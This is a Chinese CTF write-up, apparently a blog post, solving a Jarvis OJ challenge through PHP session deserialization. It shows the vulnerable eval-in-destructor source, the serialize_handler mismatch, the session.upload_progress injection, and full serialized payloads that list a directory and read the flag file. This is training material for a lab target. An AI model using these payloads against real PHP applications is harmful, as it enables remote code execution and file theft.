php session漏洞,PHP session反序列化漏洞

本文实现以下题目:

http://web.jarvisoj.com:32784/

解题思路:

1.session.upload_progress.enabled=On

解题过程如下:

1.打开地址,获取如下源代码

//A webshell is wait for you

ini_set('session.serialize_handler', 'php');

session_start();

class

OowoO

{

public

$mdzz;

function

__construct()

{

$this->mdzz = 'phpinfo();';

}

function

__destruct()

{

eval(

$this->mdzz);

}

}

if(isset(

$_GET['phpinfo']))

{

$m = new OowoO();

}

else

{

highlight_string(file_get_contents('index.php'));

}

?>

直接运行如下地址:

http://web.jarvisoj.com:32784/?phpinfo,查看PHPinfo页面,发现php.ini中默认session.serialize_handler为php_serialize,而index.php中将其设置为php。这就导致了seesion的反序列化问题。

821f9977aaf7

2.利用session.upload_progress.enabled构造session

首先构造上传表单:

test XXE

反序列化代码如下:

classOowoO

{

public$mdzz='print_r(scandir(dirname(__FILE__)));';

}

$obj =newOowoO();

$a = serialize($obj);

var_dump($a);

执行获得序列化值:

O:5:"OowoO":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}

抓包拦截,将文件名修改如下:

821f9977aaf7

可看到服务器端返回相关flag相关文件名为:Here_1s_7he_fl4g_buT_You_Cannot_see.php

获取文件路径:

821f9977aaf7

/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php

运用如下代码构造序列化值,读取flag:

class OowoO

{

public $mdzz='print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));';

}

$obj = new OowoO();

$a = serialize($obj);

var_dump($a);

序列化结果为:

O:5:"OowoO":1:{s:4:"mdzz";s:88:"print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));";}

重放数据包,获得flag:

821f9977aaf7

参考:https://blog.csdn.net/wy_97/article/details/78430690

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值